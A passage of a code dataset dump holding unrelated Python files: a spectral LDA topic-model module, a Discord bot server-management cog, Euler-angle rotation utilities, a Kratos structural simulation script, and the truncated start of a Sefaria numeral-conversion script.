2\n\t\t\tl_ns_min_2[l_ns_min_2 == 0] = 1\n\n\t\t\tscaling_factor = 1 / (self.l_ns * (l_ns_min_1) * (l_ns_min_2))\n\t\t\tscaled_document_word_counts = scaling_factor * self.document_word_counts\n\n\t\t\tpart1 = oe.contract(\n\t\t\t\t'ij,ik,il->jkl',\n\t\t\t\tscaled_document_word_counts,\n\t\t\t\tself.document_word_counts,\n\t\t\t\tself.document_word_counts,\n\t\t\t)\n\n\t\t\trho = oe.contract('ij,ik->jk', scaled_document_word_counts,\n\t\t\t self.document_word_counts)\n\t\t\tpart2 = np.zeros((self.n_words, self.n_words, self.n_words))\n\t\t\tdiagonal_indices = np.diag_indices(self.n_words, ndim=2)\n\t\t\tfor i, item in enumerate(rho):\n\t\t\t\tpart2[i][diagonal_indices] = item\n\t\t\tpart2 += oe.contract('ijk->jik', part2) + oe.contract('ijk->kji', part2)\n\n\t\t\tpart3 = np.zeros((self.n_words, self.n_words, self.n_words))\n\t\t\tpart3[np.diag_indices(self.n_words, ndim=3)] = 2 * scaled_document_word_counts.sum(axis=0)\n\n\t\t\treturn (part1 - part2 + part3) / self.n_docs\n\n\t\tdef term2():\n\n\t\t\t# clip zero counts to 1 to avoid divide by zero errors.\n\t\t\tl_ns_min_1 = self.l_ns - 1\n\t\t\tl_ns_min_1[l_ns_min_1 == 0] = 1\n\t\t\t\n\t\t\tscaling_factor = 1 / (self.l_ns * (l_ns_min_1))\n\t\t\tscaled_document_word_counts = scaling_factor * self.document_word_counts\n\n\t\t\tpart1 = oe.contract('i,jk,jl->ikl', self.moment1,\n\t\t\t scaled_document_word_counts,\n\t\t\t self.document_word_counts)\n\t\t\tpart1 += oe.contract('ijk->kij', part1) + oe.contract('ijk->jki', part1)\n\n\t\t\trho = oe.contract('i,j->ij', scaled_document_word_counts.sum(axis=0),\n\t\t\t self.moment1)\n\t\t\tpart2 = np.zeros((self.n_words, self.n_words, self.n_words))\n\t\t\tdiagonal_indices = np.diag_indices(self.n_words, ndim=2)\n\t\t\tfor i, item in enumerate(rho):\n\t\t\t\tpart2[i][diagonal_indices] = item\n\t\t\tpart2 += oe.contract('ijk->jik', part2) + oe.contract('ijk->kji', part2)\n\n\t\t\treturn (self.alpha0 / (self.alpha0 + 2)) * (\n\t\t\t\t\tpart1 - part2) / self.n_docs\n\n\t\tdef term3():\n\t\t\tmoment1 = self.moment1\n\t\t\treturn 2 * ((self.alpha0 ** 2) / (\n\t\t\t\t\t(self.alpha0 + 1) * (self.alpha0 + 2))) * oe.contract(\n\t\t\t\t'i,j,k->ijk', moment1,\n\t\t\t\tmoment1, moment1)\n\n\t\treturn (self.alpha0 * (self.alpha0 + 1) * (self.alpha0 + 2) / 2) * (\n\t\t\tterm1() - term2() + term3())\n\n\t# @seed(48)\n\t@noiser(edge='e6', symmetric=True)\n\tdef whiten_moment3(self):\n\t\t\"\"\"\n\t\tWhitens the third moment.\n\t\t:return: k by k by k tensor\n\t\t\"\"\"\n\t\treturn tensorly.tenalg.multi_mode_dot(self.moment3, np.array(\n\t\t\t[self.whitener.T for _ in range(3)]))\n\n\t# @seed(49)\n\t@noiser(edge='e7')\n\tdef decompose_moment3(self):\n\t\t\"\"\"\n\t\tPerforms CP decomposition on third moment.\n\t\t:return:\n\t\t\"\"\"\n\t\t#if self.n_words > self.n_words_threshold:\n\t\t#\tfactors = parafac(self.whitened_moment3, self.n_topics)\n\t\t#else:\n\t\tfactors = np.array(parafac(self.whitened_moment3, self.n_topics).factors)\n\t\treturn factors #np.sort(factors)[::-1] # what does the sort do?\n\n\tdef factor_correct_sign(self):\n\t\t\"\"\"\n\t\tMagic\n\t\t:return:\n\t\t\"\"\"\n\t\tfactor = np.zeros((self.n_topics, self.n_topics))\n\t\tfor i in range(self.n_topics):\n\t\t\tdiff = [\n\t\t\t\tnp.linalg.norm(self.factors[1][:, i] - self.factors[2][:, i]),\n\t\t\t\tnp.linalg.norm(self.factors[0][:, i] - self.factors[2][:, i]),\n\t\t\t\tnp.linalg.norm(self.factors[0][:, i] - self.factors[1][:, i]),\n\t\t\t]\n\t\t\tfactor[:, i] = self.factors[np.argmin(diff)][:, i]\n\t\treturn factor\n\n\t# @seed(44)\n\t@noiser(edge='e4')\n\tdef create_whitener(self):\n\t\t\"\"\"\n\t\tCreates whitener.\n\t\t:return:\n\t\t\"\"\"\n\t\treturn oe.contract('ij,ik->jk', self.m2_eigenvectors_partial,\n\t\t np.diag(1 / np.sqrt(self.m2_eigenvalues_partial)))\n\n\t# @seed(45)\n\t@noiser(edge='e8')\n\tdef create_unwhitener(self):\n\t\t\"\"\"\n\t\tCreates unwhitener.\n\t\t:return:\n\t\t\"\"\"\n\t\treturn oe.contract('ij,ik->jk', self.m2_eigenvectors_partial,\n\t\t np.diag(np.sqrt(self.m2_eigenvalues_partial)))\n\n\t# @seed(50)\n\t@noiser(edge='e9')\n\tdef create_topic_word_distribution(self):\n\t\t\"\"\"\n\t\tCreates topic word distribution.\n\t\t:return:\n\t\t\"\"\"\n\t\t# this is not true\n\t\treturn self.unwhitener.dot(self.unique_factor).dot(\n\t\t\tnp.diag(self.m3_eigenvalues))\n# \t\treturn self.unwhitener.dot(self.unique_factor).dot(\n# \t\t\tnp.diag(np.sqrt(self.m2_eigenvalues_partial)))\n\n\t@property\n\tdef n_docs(self):\n\t\treturn self.document_word_counts.shape[0]\n\n\t@property\n\tdef n_words(self):\n\t\treturn self.document_word_counts.shape[1]\n\n\t@property\n\tdef alpha0(self):\n\t\tif self._alpha0:\n\t\t\treturn self._alpha0\n\t\telse:\n\t\t\treturn np.sum(self.alpha)\n\n\t@property\n\tdef alpha(self):\n\t\t\"\"\"\n\t\tAlias of doc_topic_prior\n\t\t:return:\n\t\t\"\"\"\n\t\treturn self.doc_topic_prior\n\n\t@property\n\tdef beta(self):\n\t\t\"\"\"\n\t\tAlias of topic_word_distribution\n\t\t:return:\n\t\t\"\"\"\n\t\treturn self.topic_word_distribution\n\n\t@property\n\tdef k(self):\n\t\t\"\"\"\n\t\tAlias of n_topics\n\t\t:return:\n\t\t\"\"\"\n\t\treturn self.n_topics\n\n\t@property\n\tdef vocab_size(self):\n\t\t\"\"\"\n\t\tAlias of n_words\n\t\t:return:\n\t\t\"\"\"\n\t\treturn self.n_words\n\n\t@property\n\tdef l_ns(self):\n\t\t\"\"\"\n\t\tTotal number of words in each document.\n\t\t:return:\n\t\t\"\"\"\n\t\tif sparse.issparse(self.document_word_counts):\n\t\t\treturn self.document_word_counts.sum(axis=1)\n\t\telse:\n\t\t\treturn self.document_word_counts.sum(axis=1, keepdims=True)\n\n\t@property\n\tdef document_word_proportions(self):\n\t\tif sparse.issparse(self.document_word_counts):\n\t\t\treturn self.document_word_counts / self.document_word_counts.sum(axis=1)\n\t\telse:\n\t\t\treturn self.document_word_counts / self.document_word_counts.sum(axis=1, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t keepdims=True)\n\n\n\t@property\n\tdef m2_eigenvalues_partial(self):\n\t\treturn self.m2_eigenvalues[:self.n_topics]\n\n\t@property\n\tdef m2_eigenvectors_partial(self):\n\t\treturn self.m2_eigenvectors[:self.n_topics]\n","sub_path":"privatespectrallda/privatespectrallda/dps_lda.py","file_name":"dps_lda.py","file_ext":"py","file_size_in_byte":10545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396475313","text":"import asyncio\nimport discord\nimport requests\nimport string\nimport os\nfrom datetime import datetime\nfrom discord.ext import commands\nfrom Cogs import Settings\nfrom Cogs import Message\nfrom Cogs import Nullify\n\n# This module sets/gets some server info\n\nclass Server:\n\n\t# Init with the bot reference, and a reference to the settings var and xp var\n\tdef __init__(self, bot, settings):\n\t\tself.bot = bot\n\t\tself.settings = settings\n\n\t@commands.command(pass_context=True)\n\tasync def setinfo(self, ctx, *, word : str = None):\n\t\t\"\"\"Sets the server info (admin only).\"\"\"\n\n\t\t# Check for admin status\n\t\tisAdmin = ctx.message.author.permissions_in(ctx.message.channel).administrator\n\t\tif not isAdmin:\n\t\t\tcheckAdmin = self.settings.getServerStat(ctx.message.server, \"AdminArray\")\n\t\t\tfor role in ctx.message.author.roles:\n\t\t\t\tfor aRole in checkAdmin:\n\t\t\t\t\t# Get the role that corresponds to the id\n\t\t\t\t\tif aRole['ID'] == role.id:\n\t\t\t\t\t\tisAdmin = True\n\t\t# Only allow admins to change server stats\n\t\tif not isAdmin:\n\t\t\tawait self.bot.send_message(ctx.message.channel, 'You do not have sufficient privileges to access this command.')\n\t\t\treturn\n\n\t\t# We're admin\n\t\tif not word:\n\t\t\tself.settings.setServerStat(ctx.message.server, \"Info\", None)\n\t\t\tmsg = 'Server info *removed*.'\n\t\telse:\n\t\t\tself.settings.setServerStat(ctx.message.server, \"Info\", word)\n\t\t\tmsg = 'Server info *updated*.'\n\n\t\tawait self.bot.send_message(ctx.message.channel, msg)\n\n\t@commands.command(pass_context=True)\n\tasync def info(self, ctx):\n\t\t\"\"\"Displays the server info if any.\"\"\"\n\n\t\t# Check if we're suppressing @here and @everyone mentions\n\t\tif self.settings.getServerStat(ctx.message.server, \"SuppressMentions\").lower() == \"yes\":\n\t\t\tsuppress = True\n\t\telse:\n\t\t\tsuppress = False\n\n\t\tserverInfo = self.settings.getServerStat(ctx.message.server, \"Info\")\n\t\tmsg = 'I have no info on *{}* yet.'.format(ctx.message.server.name)\n\t\tif serverInfo:\n\t\t\tmsg = '*{}*:\\n\\n{}'.format(ctx.message.server.name, serverInfo)\n\n\t\t# Check for suppress\n\t\tif suppress:\n\t\t\tmsg = Nullify.clean(msg)\n\n\t\tawait self.bot.send_message(ctx.message.channel, msg)\n\n\t@commands.command(pass_context=True)\n\tasync def dumpservers(self, ctx):\n\t\t\"\"\"Dumps a timpestamped list of servers into the same directory as the bot (owner only).\"\"\"\n\t\t\n\t\tauthor = ctx.message.author\n\t\tserver = ctx.message.server\n\t\tchannel = ctx.message.channel\n\n\t\ttry:\n\t\t\towner = self.settings.serverDict['Owner']\n\t\texcept KeyError:\n\t\t\towner = None\n\n\t\tif owner == None:\n\t\t\t# No previous owner, let's set them\n\t\t\tmsg = 'I cannot dump the server list until I have an owner.'\n\t\t\tawait self.bot.send_message(channel, msg)\n\t\t\treturn\n\t\tif not author.id == owner:\n\t\t\t# Not the owner\n\t\t\tmsg = 'You are not the *true* owner of me. Only the rightful owner can dump the server list.'\n\t\t\tawait self.bot.send_message(channel, msg)\n\t\t\treturn\n\n\t\ttimeStamp = datetime.today().strftime(\"%Y-%m-%d %H.%M\")\n\t\tserverFile = 'ServerList-{}.txt'.format(timeStamp)\n\t\tmessage = await self.bot.send_message(ctx.message.channel, 'Saving server list to *{}*...'.format(serverFile))\n\t\tmsg = ''\n\t\tfor server in self.bot.servers:\n\t\t\tmsg += server.name + \"\\n\"\n\t\t\tmsg += server.id + \"\\n\"\n\t\t\tmsg += str(len(server.members)) + \"\\n\\n\"\n\n\t\t# Trim the last 2 newlines\n\t\tmsg = msg[:-2].encode(\"utf-8\")\n\t\t\n\t\twith open(serverFile, \"wb\") as myfile:\n\t\t\tmyfile.write(msg)\n\n\t\tmessage = await self.bot.edit_message(message, 'Uploading *{}*...'.format(serverFile))\n\t\tawait self.bot.send_file(ctx.message.channel, serverFile)\n\t\tmessage = await self.bot.edit_message(message, 'Uploaded *{}!*'.format(serverFile))\n\t\tos.remove(serverFile)\n\n\n\t@commands.command(pass_context=True)\n\tasync def leaveserver(self, ctx, *, targetServer = None):\n\t\t\"\"\"Leaves a server - can take a name or id (owner only).\"\"\"\n\t\t\n\t\tauthor = ctx.message.author\n\t\tserver = ctx.message.server\n\t\tchannel = ctx.message.channel\n\n\t\ttry:\n\t\t\towner = self.settings.serverDict['Owner']\n\t\texcept KeyError:\n\t\t\towner = None\n\n\t\tif owner == None:\n\t\t\t# No previous owner, let's set them\n\t\t\tmsg = 'I cannot leave servers until I have an owner.'\n\t\t\tawait self.bot.send_message(channel, msg)\n\t\t\treturn\n\t\tif not author.id == owner:\n\t\t\t# Not the owner\n\t\t\tmsg = 'You are not the *true* owner of me. Only the rightful owner can have me leave servers.'\n\t\t\tawait self.bot.send_message(channel, msg)\n\t\t\treturn\n\n\t\tif targetServer == None:\n\t\t\t# No server passed\n\t\t\tmsg = 'Usage: `{}leaveserver [id/name]`'.format(ctx.prefix)\n\t\t\tawait self.bot.send_message(channel, msg)\n\t\t\treturn\n\n\t\t# Check id first, then name\n\t\tfor aServer in self.bot.servers:\n\t\t\tif str(aServer.id) == str(targetServer):\n\t\t\t\t# Found it by id\n\t\t\t\tawait self.bot.send_message(aServer, 'Thanks for having me - but it\\'s my time to go...')\n\t\t\t\tawait self.bot.leave_server(aServer)\n\t\t\t\treturn\n\t\t# Didn't find it - try by name\n\t\tfor aServer in self.bot.servers:\n\t\t\tif aServer.name.lower() == targetServer.lower():\n\t\t\t\t# Found it by name\n\t\t\t\tawait self.bot.send_message(aServer, 'Thanks for having me - but it\\'s my time to go...')\n\t\t\t\tawait self.bot.leave_server(aServer)\n\t\t\t\treturn\n\n\t\tawait self.bot.send_message(ctx.message.channel, 'I couldn\\'t find that server.')","sub_path":"Cogs/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"364547189","text":"import numpy as np\nimport math\n# axis sequences for Euler angles\n_NEXT_AXIS = [1, 2, 0, 1]\n\n# map axes strings to/from tuples of inner axis, parity, repetition, frame\n_AXES2TUPLE = {\n 'sxyz': (0, 0, 0, 0), 'sxyx': (0, 0, 1, 0), 'sxzy': (0, 1, 0, 0),\n 'sxzx': (0, 1, 1, 0), 'syzx': (1, 0, 0, 0), 'syzy': (1, 0, 1, 0),\n 'syxz': (1, 1, 0, 0), 'syxy': (1, 1, 1, 0), 'szxy': (2, 0, 0, 0),\n 'szxz': (2, 0, 1, 0), 'szyx': (2, 1, 0, 0), 'szyz': (2, 1, 1, 0),\n 'rzyx': (0, 0, 0, 1), 'rxyx': (0, 0, 1, 1), 'ryzx': (0, 1, 0, 1),\n 'rxzx': (0, 1, 1, 1), 'rxzy': (1, 0, 0, 1), 'ryzy': (1, 0, 1, 1),\n 'rzxy': (1, 1, 0, 1), 'ryxy': (1, 1, 1, 1), 'ryxz': (2, 0, 0, 1),\n 'rzxz': (2, 0, 1, 1), 'rxyz': (2, 1, 0, 1), 'rzyz': (2, 1, 1, 1)}\n\n_TUPLE2AXES = dict((v, k) for k, v in _AXES2TUPLE.items())\n\n# For testing whether a number is close to zero\n_EPS4 = np.finfo(float).eps * 4.0\n\n\ndef euler2mat(ai, aj, ak, axes='sxyz'):\n \"\"\"Return rotation matrix from Euler angles and axis sequence.\n Parameters\n ----------\n ai : float\n First rotation angle (according to `axes`).\n aj : float\n Second rotation angle (according to `axes`).\n ak : float\n Third rotation angle (according to `axes`).\n axes : str, optional\n Axis specification; one of 24 axis sequences as string or encoded\n tuple - e.g. ``sxyz`` (the default).\n Returns\n -------\n mat : array (3, 3)\n Rotation matrix or affine.\n Examples\n --------\n >>> R = euler2mat(1, 2, 3, 'syxz')\n >>> np.allclose(np.sum(R[0]), -1.34786452)\n True\n >>> R = euler2mat(1, 2, 3, (0, 1, 0, 1))\n >>> np.allclose(np.sum(R[0]), -0.383436184)\n True\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i+parity]\n k = _NEXT_AXIS[i-parity+1]\n\n if frame:\n ai, ak = ak, ai\n if parity:\n ai, aj, ak = -ai, -aj, -ak\n\n si, sj, sk = math.sin(ai), math.sin(aj), math.sin(ak)\n ci, cj, ck = math.cos(ai), math.cos(aj), math.cos(ak)\n cc, cs = ci*ck, ci*sk\n sc, ss = si*ck, si*sk\n\n M = np.eye(3)\n if repetition:\n M[i, i] = cj\n M[i, j] = sj*si\n M[i, k] = sj*ci\n M[j, i] = sj*sk\n M[j, j] = -cj*ss+cc\n M[j, k] = -cj*cs-sc\n M[k, i] = -sj*ck\n M[k, j] = cj*sc+cs\n M[k, k] = cj*cc-ss\n else:\n M[i, i] = cj*ck\n M[i, j] = sj*sc-cs\n M[i, k] = sj*cc+ss\n M[j, i] = cj*sk\n M[j, j] = sj*ss+cc\n M[j, k] = sj*cs-sc\n M[k, i] = -sj\n M[k, j] = cj*si\n M[k, k] = cj*ci\n return M\n\n\ndef mat2euler(mat, axes='sxyz'):\n \"\"\"Return Euler angles from rotation matrix for specified axis sequence.\n Note that many Euler angle triplets can describe one matrix.\n Parameters\n ----------\n mat : array-like shape (3, 3) or (4, 4)\n Rotation matrix or affine.\n axes : str, optional\n Axis specification; one of 24 axis sequences as string or encoded\n tuple - e.g. ``sxyz`` (the default).\n Returns\n -------\n ai : float\n First rotation angle (according to `axes`).\n aj : float\n Second rotation angle (according to `axes`).\n ak : float\n Third rotation angle (according to `axes`).\n Examples\n --------\n >>> R0 = euler2mat(1, 2, 3, 'syxz')\n >>> al, be, ga = mat2euler(R0, 'syxz')\n >>> R1 = euler2mat(al, be, ga, 'syxz')\n >>> np.allclose(R0, R1)\n True\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes.lower()]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i+parity]\n k = _NEXT_AXIS[i-parity+1]\n\n M = np.array(mat, dtype=np.float64, copy=False)[:3, :3]\n if repetition:\n sy = math.sqrt(M[i, j]*M[i, j] + M[i, k]*M[i, k])\n if sy > _EPS4:\n ax = math.atan2( M[i, j], M[i, k])\n ay = math.atan2( sy, M[i, i])\n az = math.atan2( M[j, i], -M[k, i])\n else:\n ax = math.atan2(-M[j, k], M[j, j])\n ay = math.atan2( sy, M[i, i])\n az = 0.0\n else:\n cy = math.sqrt(M[i, i]*M[i, i] + M[j, i]*M[j, i])\n if cy > _EPS4:\n ax = math.atan2( M[k, j], M[k, k])\n ay = math.atan2(-M[k, i], cy)\n az = math.atan2( M[j, i], M[i, i])\n else:\n ax = math.atan2(-M[j, k], M[j, j])\n ay = math.atan2(-M[k, i], cy)\n az = 0.0\n\n if parity:\n ax, ay, az = -ax, -ay, -az\n if frame:\n ax, az = az, ax\n return ax, ay, az","sub_path":"transform3d/euler.py","file_name":"euler.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"556924345","text":"from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7\n# Activate it to import in the gdb path:\n# import sys\n# sys.path.append('/home/jmaria/kratos')\n# x = raw_input(\"stopped to allow debug: set breakpoints and press enter to continue\");\n\n#\n# ***************GENERAL MAIN OF THE ANALISYS****************###\n#\n\n# time control starts\nfrom time import *\nprint(ctime())\n# measure process time\nt0p = clock()\n# measure wall time\n# t0w = time()\n\n# ----------------------------------------------------------------#\n# --CONFIGURATIONS START--####################\n# Import the general variables read from the GiD\nimport ProjectParameters as general_variables\n\n# setting the domain size for the problem to be solved\ndomain_size = general_variables.domain_size\n\n# including kratos path\nfrom KratosMultiphysics import *\n\n# including Applications paths\nfrom KratosMultiphysics.ExternalSolversApplication import *\nfrom KratosMultiphysics.SolidMechanicsApplication import *\nfrom KratosMultiphysics.StructuralMechanicsApplication import *\n\n# import the python utilities:\nimport restart_utility as restart_utils\nimport gid_output as gid_utils\n\nimport conditions_python_utility as condition_utils\nimport list_files_python_utility as files_utils\n\nimport time_operation_utility as operation_utils\n\n# ------------------------#--FUNCTIONS START--#------------------#\n# ---------------------------------------------------------------#\n# --TIME MONITORING START--##################\ndef StartTimeMeasuring():\n # measure process time\n time_ip = clock()\n return time_ip\n\n\ndef StopTimeMeasuring(time_ip, process):\n # measure process time\n time_fp = clock()\n print(\" \", process, \" [ spent time = \", time_fp - time_ip, \"] \")\n# --TIME MONITORING END --###################\n\n# --SET NUMBER OF THREADS --#################\n\n\ndef SetParallelSize(num_threads):\n parallel = OpenMPUtils()\n print(\"Num Threads = \", num_threads)\n parallel.SetNumThreads(int(num_threads))\n# --SET NUMBER OF THREADS --#################\n\n# ------------------------#--FUNCTIONS END--#--------------------#\n# ---------------------------------------------------------------#\n\n\n# defining the number of threads:\nnum_threads = general_variables.NumberofThreads\nSetParallelSize(num_threads)\n\n# defining the type, the name and the path of the problem:\nproblem_type = general_variables.ProblemType\nproblem_name = general_variables.problem_name\nproblem_path = general_variables.problem_path\n\n# defining a model part\nmodel_part = ModelPart(\"SolidDomain\")\n\n# defining the model size to scale\nlength_scale = 1.0\n\n# --DEFINE MAIN SOLVER START--################\n\nSolverSettings = general_variables.SolverSettings\n\n# import solver file\nsolver_constructor = __import__(SolverSettings.solver_type)\n\n# construct the solver\nmain_step_solver = solver_constructor.CreateSolver(model_part, SolverSettings)\n\n# --DEFINE MAIN SOLVER END--##################\n\n\n# --READ AND SET MODEL FILES--###############\n\n# set the restart of the problem\nrestart_step = general_variables.Restart_Step\nproblem_restart = restart_utils.RestartUtility(model_part, problem_path, problem_name)\n\n# set the results file list of the problem (managed by the problem_restart and gid_print)\nprint_lists = general_variables.PrintLists\noutput_mode = general_variables.GidOutputConfiguration.GiDPostMode\nlist_files = files_utils.ListFilesUtility(problem_path, problem_name, print_lists, output_mode)\nlist_files.Initialize(general_variables.file_list)\n\n# --READ AND SET MODEL FILES END--############\n\n\n# --DEFINE CONDITIONS START--#################\nincr_disp = general_variables.Incremental_Displacement\nincr_load = general_variables.Incremental_Load\nrotation_dofs = SolverSettings.RotationDofs\nconditions = condition_utils.ConditionsUtility(model_part, domain_size, incr_disp, incr_load, rotation_dofs)\n\n# --DEFINE CONDITIONS END--###################\n\n\n# --GID OUTPUT OPTIONS START--###############\n# set gid print options\ngid_print = gid_utils.GiDOutput(problem_name, general_variables.GidOutputConfiguration)\n\n# --GID OUTPUT OPTIONS END--##################\n\n\n# --CONFIGURATIONS END--######################\n# ----------------------------------------------------------------#\n\n\n# --START SOLUTION--######################\n#\n# initialize problem : load restart or initial start\nload_restart = general_variables.LoadRestart\nsave_restart = general_variables.SaveRestart\n\n# set buffer size\nbuffer_size = 3\n\n# define problem variables:\nsolver_constructor.AddVariables(model_part, SolverSettings)\n\n\n# --- READ MODEL ------#\nif(load_restart == False):\n\n # remove results, restart, graph and list previous files\n problem_restart.CleanPreviousFiles()\n list_files.RemoveListFiles()\n\n # reading the model\n model_part_io = ModelPartIO(problem_name)\n model_part_io.ReadModelPart(model_part)\n\n # set the buffer size\n model_part.SetBufferSize(buffer_size)\n # Note: the buffer size should be set once the mesh is read for the first time\n\n # set the degrees of freedom\n solver_constructor.AddDofs(model_part, SolverSettings)\n\n # set the constitutive law\n import constitutive_law_python_utility as constitutive_law_utils\n\n constitutive_law = constitutive_law_utils.ConstitutiveLawUtility(model_part, domain_size);\n constitutive_law.Initialize();\n\nelse:\n\n # reading the model from the restart file\n problem_restart.Load(restart_step);\n\n # remove results, restart, graph and list posterior files\n problem_restart.CleanPosteriorFiles(restart_step)\n list_files.ReBuildListFiles()\n\n# set mesh searches and modeler\n# modeler.InitializeDomains();\n\n# if(load_restart == False):\n # find nodal h\n # modeler.SearchNodalH();\n\n\n# --- PRINT CONTROL ---#\nprint(model_part)\nprint(model_part.Properties[1])\n\n\n# --INITIALIZE--###########################\n#\n\n# set delta time in process info\nmodel_part.ProcessInfo[DELTA_TIME] = general_variables.time_step\n\n# solver initialize\nmain_step_solver.Initialize()\nmain_step_solver.SetRestart(load_restart) #calls strategy initialize if no restart\n\n# initial contact search\n# modeler.InitialContactSearch()\n\n#define time steps and loop range of steps\ntime_step = model_part.ProcessInfo[DELTA_TIME]\n\n# define time steps and loop range of steps\nif(load_restart):\n\n buffer_size = 0\n\nelse:\n\n model_part.ProcessInfo[TIME] = 0\n model_part.ProcessInfo[TIME_STEPS] = 0\n model_part.ProcessInfo[PREVIOUS_DELTA_TIME] = time_step;\n\n conditions.Initialize(time_step);\n\n\n# initialize step operations\nstarting_step = model_part.ProcessInfo[TIME_STEPS]\nstarting_time = model_part.ProcessInfo[TIME]\nending_step = general_variables.nsteps\nending_time = general_variables.nsteps * time_step\n\n\noutput_print = operation_utils.TimeOperationUtility()\ngid_time_frequency = general_variables.GiDWriteFrequency\noutput_print.InitializeTime(starting_time, ending_time, time_step, gid_time_frequency)\n\nrestart_print = operation_utils.TimeOperationUtility()\nrestart_time_frequency = general_variables.RestartFrequency\nrestart_print.InitializeTime(starting_time, ending_time, time_step, restart_time_frequency)\n\n\n# --TIME INTEGRATION--#######################\n#\n\n# writing a single file\ngid_print.initialize_results(model_part)\n\n#initialize time integration variables\ncurrent_time = starting_time\ncurrent_step = starting_step\n\n# filling the buffer\nfor step in range(0,buffer_size):\n\n model_part.CloneTimeStep(current_time)\n model_part.ProcessInfo[DELTA_TIME] = time_step\n model_part.ProcessInfo[TIME_STEPS] = step-buffer_size\n\n# writing a initial state results file\ncurrent_id = 0\ngid_print.write_results(current_time, model_part, general_variables.nodal_results, general_variables.gauss_points_results)\nlist_files.PrintListFiles(current_id);\n\n# solving the problem\nwhile(current_time < ending_time):\n\n # store previous time step\n model_part.ProcessInfo[PREVIOUS_DELTA_TIME] = time_step\n # set new time step ( it can change when solve is called )\n time_step = model_part.ProcessInfo[DELTA_TIME]\n\n current_time = current_time + time_step\n current_step = current_step + 1\n model_part.CloneTimeStep(current_time)\n model_part.ProcessInfo[TIME] = current_time\n\n print(\"STEP = \", current_step)\n print(\"TIME = \", current_time)\n\n clock_time = StartTimeMeasuring();\n # solve time step non-linear system\n main_step_solver.Solve()\n StopTimeMeasuring(clock_time, \"Solving\");\n\n # incremental load\n conditions.SetIncrementalLoad(current_step, time_step);\n\n # print the results at the end of the step\n #execute_write = output_print.perform_time_operation(current_time)\n execute_write = False\n if(execute_write):\n clock_time = StartTimeMeasuring();\n current_id = output_print.operation_id()\n # print gid output file\n gid_print.write_results(model_part, general_variables.nodal_results, general_variables.gauss_points_results, current_time, current_step, current_id)\n # print on list files\n list_files.PrintListFiles(current_id);\n StopTimeMeasuring(clock_time, \"Write Results\");\n\n # print restart file\n save_restart = False\n if(save_restart):\n execute_save = restart_print.perform_time_operation(current_time)\n if(execute_save):\n clock_time = StartTimeMeasuring();\n current_id = output_print.operation_id()\n problem_restart.Save(current_time, current_step, current_id);\n StopTimeMeasuring(clock_time, \"Restart\");\n\n \n conditions.RestartImposedDisp()\n\n# --FINALIZE--############################\n#\n\n# writing a single file\ngid_print.finalize_results()\n\nprint(\"Analysis Finalized \")\n\n# --END--###############################\n#\n\n# measure process time\ntfp = clock()\n# measure wall time\n# tfw = time()\n\nprint(ctime())\n# print \"Analysis Completed [Process Time = \", tfp - t0p, \"seconds, Wall Time = \", tfw - t0w, \" ]\"\nprint(\"Analysis Completed [Process Time = \", tfp - t0p, \"] \")\n\n# to create a benchmark: add standard benchmark files and decomment next two lines \n# rename the file to: run_test.py\nfrom run_test_benchmark_results import *\nWriteBenchmarkResults(model_part)\n","sub_path":"kratos/applications/StructuralMechanicsApplication/test_examples/Shell_Q4_Thick__DrillingRollUp.gid/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":10140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"582000351","text":"import django\n\ndjango.setup()\n\ndjango.setup()\n\n# import statistics\nimport csv\nfrom sefaria.model import *\nfrom sefaria.helper.schema import insert_last_child, reorder_children\nfrom sefaria.helper.schema import remove_branch\nfrom sefaria.tracker import modify_bulk_text\nfrom sefaria.system.database import db\nimport time\n\n\ndef latin_numeral_to_hebrew_numeral(latin_numeral):\n if latin_numeral == \"I\":\n return (\"א'\")\n if latin_numeral == \"II\":\n return (\"ב'\")\n if latin_numeral == \"III\":\n return (\"ג'\")\n if latin_numeral == \"IV\":\n return (\"ד'\")\n if latin_numeral == \"V\":\n return (\"ה'\")\n if latin_numeral == \"VI\":\n return (\"ו'\")\n if latin_numeral == \"VII\":\n return (\"ז'\")\n if latin_numeral == \"VIII\":\n return (\"ח'\")\n if latin_numeral == \"IX\":\n return (\"ט'\")\n if latin_numeral == \"X\":\n return (\"י'\")\n if latin_numeral == \"XI\":\n return ('י\"א')\n if latin_numeral == \"XII\":\n return ('י\"ב')\n if latin_numeral == \"XIII\":\n return ('י\"ג')\n if latin_numeral == \"XIV\":\n return ('י\"ד')\n if latin_numeral == \"XV\":\n return ('ט\"ו')\n if latin_numeral == \"XVI\":\n return ('ט\"ז')\n if latin_numeral == \"XVII\":\n return ('י\"ז')\n if latin_numeral == \"XVIII\":\n return ('י\"ח')\n if latin_numeral == \"XIX\":\n return ('י\"ט')\n if latin_numeral == \"XX\":\n return (\"כ'\")\n if latin_numeral == \"XXI\":\n return ('כ\"א')\n if latin_numeral == \"XXII\":\n return ('כ\"ב')\n if latin_numeral == \"XXIII\":\n return ('כ\"ג')\n if latin_numeral == \"XXIV\":\n return ('כ\"ד')\n if latin_numeral == \"XXV\":\n return ('כ\"ה')\n if latin_numeral == \"XXVI\":\n return ('כ\"ו')\n if latin_numeral == \"XXVII\":\n return ('כ\"ז')\n if latin_numeral == \"XXVIII\":\n return ('כ\"ח')\n if latin_numeral == \"XXIX\":\n return ('כ\"ט')\n if latin_numeral == \"XXX\":\n return (\"ל'\")\n\n\ndef translate_title_to_hebrew(title, masechet_hebrew):\n hebrew_title = ''\n if 'Introduction to' in title:\n hebrew_title += 